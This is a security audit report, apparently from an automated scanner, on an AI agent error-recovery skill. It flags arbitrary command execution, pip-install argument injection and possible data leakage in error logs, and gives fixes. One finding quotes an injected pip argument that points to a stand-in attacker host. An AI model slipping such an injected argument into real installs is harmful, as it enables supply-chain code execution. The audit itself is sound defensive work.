Security Audit
Sounder25/Google-Antigravity-Skills-Library:06_error_recovery
github.com/Sounder25/Google-Antigravity-Skills-LibraryTrust Assessment
Sounder25/Google-Antigravity-Skills-Library:06_error_recovery received a trust score of 48/100, placing it in the Untrusted category. This skill has significant security findings that require attention before use in production.
SkillShield's automated analysis identified 3 findings: 1 critical, 1 high, 1 medium, and 0 low severity. Key findings include Arbitrary Command Execution via User Input, Command Injection via Heuristic Auto-Fixes (pip install), Potential Data Exfiltration via ERROR_STATE.json.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The Static Code Analysis layer scored lowest at 48/100, indicating areas for improvement.
Last analyzed on February 28, 2026 (commit 09376edc). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings3
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Arbitrary Command Execution via User Input The skill is designed to accept an arbitrary `--command` as input and execute it. This allows an attacker to run any command on the host system where the skill is executed, leading to full system compromise, data exfiltration, or denial of service. The `SKILL.md` explicitly states 'The command to execute' as a required input parameter. Implement strict sandboxing for command execution, such as containerization or a highly restricted execution environment. Alternatively, redesign the skill to use a predefined set of safe operations rather than arbitrary command input. If arbitrary commands are absolutely necessary, implement robust input validation and sanitization, though this is extremely difficult to do securely for shell commands. | Static | SKILL.md:20 | |
| HIGH | Command Injection via Heuristic Auto-Fixes (pip install) The skill's 'Supported Heuristics' include automatically running `pip install <module>` in response to a `ModuleNotFoundError`. If the `<module>` name can be influenced by untrusted input (e.g., from a file content or a previous command's output), an attacker could inject malicious package names or additional pip arguments, leading to arbitrary code execution or supply chain attacks. For example, injecting `malicious_package --extra-index-url http://attacker.com`. Ensure that the `<module>` name extracted for `pip install` is strictly validated against a whitelist of known safe modules or sanitized to prevent injection of additional arguments or malicious package names. Consider using a virtual environment for all `pip install` operations to isolate dependencies. | Static | SKILL.md:34 | |
| MEDIUM | Potential Data Exfiltration via ERROR_STATE.json The skill outputs an `ERROR_STATE.json` file containing the 'stack trace, context, and failed fix attempts' upon failure. Stack traces and error contexts can sometimes contain sensitive information such as file paths, environment variables, partial data, or internal system details. If this file is accessible to unauthorized entities or transmitted without proper sanitization, it could lead to information disclosure. Review the contents of `ERROR_STATE.json` to ensure no sensitive data is inadvertently included. Implement redaction or sanitization for potentially sensitive fields within stack traces or error contexts before writing to the file. Ensure proper access controls are in place for the `ERROR_STATE.json` file. | Static | SKILL.md:28 |
Scan History
Embed Code
[](https://skillshield.io/report/c21d91d3b2650f3b)
Powered by SkillShield